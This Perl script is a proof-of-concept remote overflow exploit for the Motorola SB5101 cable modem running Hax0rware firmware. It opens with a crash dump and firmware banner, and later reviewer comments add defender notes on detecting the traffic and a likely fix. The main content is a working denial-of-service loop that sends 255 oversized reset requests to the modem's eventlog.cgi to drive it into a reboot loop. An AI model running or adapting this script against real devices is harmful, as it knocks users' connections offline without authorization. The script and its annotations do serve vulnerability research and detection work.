#!/usr/bin/perl
# Motorola SB5101 Hax0rware Event Reset Remote Overflow
# Tested on Hax0rware 1.1 R30, R32 and R39
# Author: Dillon Beresford
# Date: 6/6/2010
# Vendor: Motorola Corporation and SBHacker ( SBHacker has been notified of the vuln ).
# Software Link: http://www.sbhacker.net/forum/index.php
# Description: Motorola SB5101 Hax0rware Event Reset Remote Buffer Overflow
# An unauthenticated attacker could send multiple log reset requests to eventlog.cgi,
# causing a denial of service, which would send the cable modem into a reboot loop.
# For debugging telnet into the device 192.168.100.1 and run the poc.
# >>> YIKES... looks like you may have a problem! <<<
# r0/zero=00000000 r1/at=80510000 r2/v0=00000000 r3/v1=00000002
# r4/a0=ac100102 r5/a1=00000000 r6/a2=00000001 r7/a3=8069b914
# r8/t0=00000001 r9/t1=00000000 r10/t2 =00000001 r11/t3 =00000000
# r12/t4 =00000000 r13/t5 =00000000 r14/t6 =00000000 r15/t7 =00000005
# r16/s0 =807bd04c r17/s1 =807bd004 r18/s2 =807bd000 r19/s3 =8069bb90
# r20/s4 =8069bb88 r21/s5 =11110015 r22/s6 =11110016 r23/s7 =11110017
# r24/t8 =00000000 r25/t9 =00000009 r26/k0 =807d2698 r27/k1 =8069bc7c
# r28/gp =80458fa0 r29/sp =8069b910 r30/fp =8069b970 r31/ra =80197d24
# PC : 0x80197e14error addr: 0xac100102
# cause: 0x00000010status: 0x1000ff03
# BCM interrupt enable: fffffff7, status: 00000000
# Instruction at PC: 0x8c830000
# entry 80197c58called from 801dbe10
# entry 801dbd08called from 80242f64
# entry 80242eb8called from 802fb2e4
# entry 802fb2accalled from 802fb2a4
# entry 802fb2acReturn address (00000000) invalid.Trace stops.
# Task: NetToMedia Thread
# ---------------------------------------------------
# ID: 0x0025
# Handle: 0x8069ba24
# Set Priority: 23
# Current Priority: 23
# State:SUSP
# Stack Base: 0x8069a9b0
# Stack Size: 4096 bytes
# Stack Used: 1088 bytes
# Stack StackStack
# TaskId TaskNamePriority StateSizeUsed Margin
# ---------- ------------------------------------------------------------------------
# 0x8048f818 Idle Thread31 RUN 20481064 984
# 0x805131d0 Network alarm support 6 SLEEP 225612321024
# 0x804924c8 Network support 7 SLEEP 819218246368
# 0x80513f20pthread.0000080015EXIT 785211046748
# 0x8048a1c8tStartup18 SLEEP1228852087080
# 0x8054b9ac Rajko HttpD23 SLEEP 328021641116
# 0x807f579cNonVol Device Async Helper25 SLEEP 3072 5042568
# 0x807ebc7cMotorola Standby Switch Thread23 SLEEP 4096 4403656
# 0x807ea984Motorola Vendor Ctl Thread23 SLEEP 4096 5123584
# 0x807f64e8WDOG17 RUN 512027842336
# 0x807e8eb0 BFC Ping Thread29 SLEEP 6144 4765668
# 0x807e870c ConsoleThread27 RUN368642168 34696
# 0x807d6c58 TelnetD23 RUN 22562040 216
# 0x807ca564CfgVB Thread23 SLEEP 4096 5163580
# 0x807c5400DHCM25 SLEEP16384 516 15868
# 0x807bf390 Event25 SLEEP0 0 0 OVERFLOW
# 0x8079a900Time Of Day Thread23 SLEEP 6144 4605684
# 0x8079ad70CmDocsisIpThread23 SLEEP 8192 5087684
# 0x80793edc CmBpiManagerThd25 SLEEP 8192 5127680
# 0x8079035c CmDsxHelper23 SLEEP 8192 5087684
# 0x807ac334 CmDocsisCtlThread21 SLEEP 8192 5167676
# 0x80789228Scan Downstream Thread23 SLEEP 409614162680
# 0x80786004RateShaping Thread23 SLEEP 4096 4483648
# 0x807f65e0CMHL23 SLEEP 4500 3724128
# 0x807f66d8CMHH21 SLEEP 4500 3564144
# 0x807f67d0ENRX23 SLEEP 450012483252
# 0x807f68c8ENTX23 SLEEP 4500 7883712
# 0x807f69c0ELNK23 SLEEP 4500 3244176
# 0x807f6ab8USTX23 SLEEP 4500 3444156
# 0x807f6bb0USRX23 SLEEP 4500 3764124
# 0x807f6ca8UBCT19 SLEEP 4500 3604140
# 0x807f6da0USRN23 SLEEP 4500 3444156
# 0x806a5e18DHCP Client Thread23 SLEEP12288 512 11776
# 0x807f6e98IpHalIst23 RUN 4500 8163684
# 0x8069ff7cCmPropaneCtlThread23 SLEEP 819216326560
# 0x8069d320 IGMP Thread23 SLEEP 4096 4603636
# 0x8069ba24 NetToMedia Thread23SUSP 409610883008
# 0x8069798c Trap Thread23 SLEEP16384 504 15880
# 0x807f6030 SNMP Thread23 SLEEP204801196 19284
# 0x805aaf20DHCP Server Thread23 SLEEP 819214486744
# 0x8047b410tNonVolTimer30 SLEEP 2048 2921756
# * *
#*** ***
#*** ***
#*** ***
# ***** *****
# ***** *****
# ***** *****
#******* *******
#******* *******
#******* *******
# ********* *********
# ********* *********
# ******* *******
#*********
#*** * ***
#** **
# ** **
# ** **
#** **
#* *
#MotorolaCorporation
# +----------------------------------------------------------------------------+
# | _/_/ _/_/_/_/_/_/|
# |_/_/ _/_/_/ Broadband |
# | _/_/ _/_/|
# |_/_/ _/_/_/_/ Foundation|
# | _/_/ _/_/|
# |_/ _/_/_/_/ Classes |
# | _/_/_/ _/_/_/|
# ||
# | Copyright (c) 1999 - 2007 Broadcom Corporation |
# ||
# | Revision:3.9.33.3 RELEASE|
# ||
# | Features:Console Nonvol Fat HeapManager SNMP Networking USB1.1 |
# +----------------------------------------------------------------------------+
# | Standard Embedded Target Support for BFC |
# ||
# | Copyright (c) 2003 - 2007 Broadcom Corporation |
# ||
# | Revision:3.0.1 RELEASE |
# ||
# | Features:PID=0xc011 Bootloader-Rev=2.1.6d|
# | Copyright (c) 2003 - 2007 Broadcom Corporation |
# ||
# | Revision:3.0.1 RELEASE |
# ||
# | Features:PID=0xc011 Bootloader-Rev=2.1.6d|
# | Features:Bootloader-Compression-Support=0x19 |
# +----------------------------------------------------------------------------+
# | eCos BFC Application Layer |
# ||
# | Copyright (c) 1999 - 2007 Broadcom Corporation |
# ||
# | Revision:3.0.2 RELEASE |
# ||
# | Features:eCos Console Cmds, (no Idle Loop Profiler)|
# +----------------------------------------------------------------------------+
# | _/_/_/ _/|
# |_/_/_/_/ _/_/ DOCSIS Cable Modem|
# | _/_/_/ _/|
# |_/_/ _/ |
# | _/_/ _/|
# |_/_/_/ _/ |
# | _/_/_/ _/|
# ||
# | Copyright (c) 1999 - 2005 Broadcom Corporation |
# ||
# | Revision:3.9.33.3 RELEASE|
# ||
# | Features:AckCel(tm) DOCSIS 1.0/1.1/2.0 Propane(tm) CM SNMP w/Factory MIB |
# | Features:Support CM Vendor Extension |
# +----------------------------------------------------------------------------+
# | Motorola Data-Only CM Vendor Extension |
# ||
# | Revision:3.0.0a RELEASE|
# ||
# | Features:DHCP ServerHTTP Server|
# +----------------------------------------------------------------------------+
# | Build Date:Apr 29 2009 |
# | Build Time:15:08:51|
# | Built By:vobadm02|
# +----------------------------------------------------------------------------+

# What the code below does, as written:
#   1. builds an 8096-byte string consisting of the byte 0x31 ('1') repeated;
#   2. prints a banner;
#   3. issues 255 HTTP GET requests to /eventlog.cgi on 192.168.100.1, passing
#      that string as the `reset` query parameter, printing a line per request;
#   4. prints a completion message.
# The response body is assigned to $contents but never inspected, so the loop
# cannot tell whether a request succeeded, failed, or reached a device that has
# already rebooted. The crash dump above shows the "Event" task at 0 stack with
# the OVERFLOW marker, which is what the author attributes to the oversized
# parameter.
#
# Defender notes: on the wire this is a burst of GET requests to eventlog.cgi
# carrying a query string of roughly 8 KiB, which is far larger than the CGI's
# normal use and simple to alert on at the LAN-side HTTP server or any proxy in
# front of it. On the device side, the fix is presumably to bound the length of
# the `reset` parameter before it reaches the event-log handler (TODO confirm
# against the firmware; the handler itself is not shown here).
#
# NOTE(review): no `use strict` / `use warnings`; $count and $contents are
# undeclared package globals, and $contents is write-only.

use LWP::Simple;

# 8096 copies of "\x31" ("1"); this is the oversized `reset` value.
my $junk = "\x31" x 8096;

print "+---------------------------------------------------------------+\n".
      "| Motorola SB5101 Hax0rware Event Reset Remote Overflow |\n".
      "| Motorola: SB5101-2.7.6.0-GA-00-NOSH |\n".
      "| Version: 1.1 R30, R32 and R39 |\n".
      "| Vendor: Motorola Corporation and SBHacker |\n".
      "| Author: Dillon Beresford|\n".
      "| Date: 6/6/2010|\n".
      "+---------------------------------------------------------------+\n";

# 255 requests (1 .. 255). LWP::Simple::get returns undef on a failed request;
# that case is not distinguished from success here.
for ($count = 1; $count < 256; $count++) {
    $contents = get("http://192.168.100.1/eventlog.cgi?reset=".$junk);
    print "sending request to cable modem\n";
}

# Printed unconditionally; nothing above verifies the device's state.
print "We killed it!\n";